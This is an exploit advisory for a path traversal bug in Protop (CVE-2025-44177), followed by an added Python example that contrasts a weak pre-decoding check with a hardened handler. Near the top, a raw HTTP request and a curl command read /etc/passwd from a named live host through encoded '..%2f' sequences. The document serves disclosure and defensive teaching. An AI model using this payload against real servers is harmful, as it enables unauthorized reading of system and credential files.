# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal

# Description:
# A Local File Inclusion (path traversal) vulnerability exists in White Star Software Protop v4.4.2-2024-11-27.
# An unauthenticated remote attacker can read arbitrary files from the server by sending
# URL-encoded traversal sequences (..%2f) to the `/pt3upd/` endpoint.

# Vulnerable Endpoint:

GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*

# Example curl command:

curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'

# Notes:
# - Vulnerability confirmed on the public instance at the time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.

# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09
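# Added illustration (not part of the advisory, and not Protop's code, whose handler
# internals the advisory does not describe) of the bug class above: a '..' check
# applied to the still-URL-encoded request target is bypassed by '..%2f', while a
# handler that decodes first and then canonicalises under its document root is not.
# BASE_DIR, vulnerable_resolve() and safe_resolve() are hypothetical names chosen here.

```python
"""Encoded path traversal: weak check before decoding vs. decode-then-canonicalise.

Hypothetical example added alongside the Protop advisory; BASE_DIR and both
handlers are invented for illustration and are not the vendor's code.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical document root that a /pt3upd/ route would serve files from.
BASE_DIR = "/var/www/pt3upd"

# Request target from the advisory with the "/pt3upd/" route prefix stripped,
# as a router would hand it to the file-serving handler.
ADVISORY_TARGET = "..%2f..%2f..%2f..%2fetc%2fpasswd"


def vulnerable_resolve(raw_target: str) -> Optional[str]:
    """Hypothetical weak handler: rejects '..' path segments, but inspects the
    raw, still-encoded target.  Splitting on '/' never yields a '..' segment
    when the separators arrive as '%2f', so the check passes; the target is
    decoded only afterwards and joined under BASE_DIR, where normpath walks
    straight out of the root.  Returns None when the check blocks the request."""
    for segment in raw_target.split("/"):
        if segment == "..":
            return None
    decoded = unquote(raw_target)
    return posixpath.normpath(posixpath.join(BASE_DIR, decoded))


def safe_resolve(raw_target: str) -> Optional[str]:
    """Hardened handler: decode first, build the path relative to BASE_DIR,
    canonicalise lexically, then require the result to remain inside the root.
    Returns None for anything that escapes or smuggles a NUL byte."""
    decoded = unquote(raw_target)
    if "\x00" in decoded:
        return None
    # lstrip('/') stops posixpath.join from discarding BASE_DIR when the
    # decoded target is absolute (e.g. "/etc/passwd").
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, decoded.lstrip("/")))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    # In a real handler, follow this with os.path.realpath(candidate) and
    # repeat the commonpath check so a symlink inside the root cannot point
    # back out of it.
    return candidate


if __name__ == "__main__":
    # Constructed inputs: the advisory's target, its plain-text form, and a benign file.
    for target in (ADVISORY_TARGET, "../../../../etc/passwd", "notes/readme.txt"):
        print(f"{target!r:42} weak={vulnerable_resolve(target)!r:38} "
              f"safe={safe_resolve(target)!r}")
```

The plain `../../../../etc/passwd` form is caught by the weak handler, which is exactly why the advisory's request uses `%2f`: the check sees one opaque segment, and decoding happens after the decision has already been made. The hardened version makes the containment check the last step after every transformation, which is the only ordering that survives encoding tricks.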